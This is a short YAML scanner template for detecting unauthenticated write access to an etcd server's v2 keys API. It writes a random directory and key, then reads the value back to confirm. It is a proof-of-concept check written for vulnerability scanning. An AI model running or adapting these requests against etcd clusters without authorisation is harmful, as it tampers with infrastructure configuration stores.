name: etcd-unauth

info:
    name: ETCD Unauth
    author: j4ckzh0u(https://github.com/j4ckzh0u)
    severity: high

set:
    r1: randomLowercase(32)
    r2: randomLowercase(32)
    r3: randomLowercase(32)
rules:
    r0:
        request:
            method: PUT
            path: /v2/keys/{{r1}}?dir=true
        expression: response.status == 201
    r1:
        request:
            method: PUT
            path: /v2/keys/{{r1}}/{{r2}}?prevExist=false
            headers:
                Content-Type: application/x-www-form-urlencoded
            body: value={{r3}}
        expression: response.status == 201
    r2:
        request:
            method: GET
            path: /v2/keys/{{r1}}/{{r2}}?quorum=false&recursive=false&sorted=false
        expression: response.status == 200 && response.body.bcontains(bytes(r3))
expression: r0() && r1() && r2()

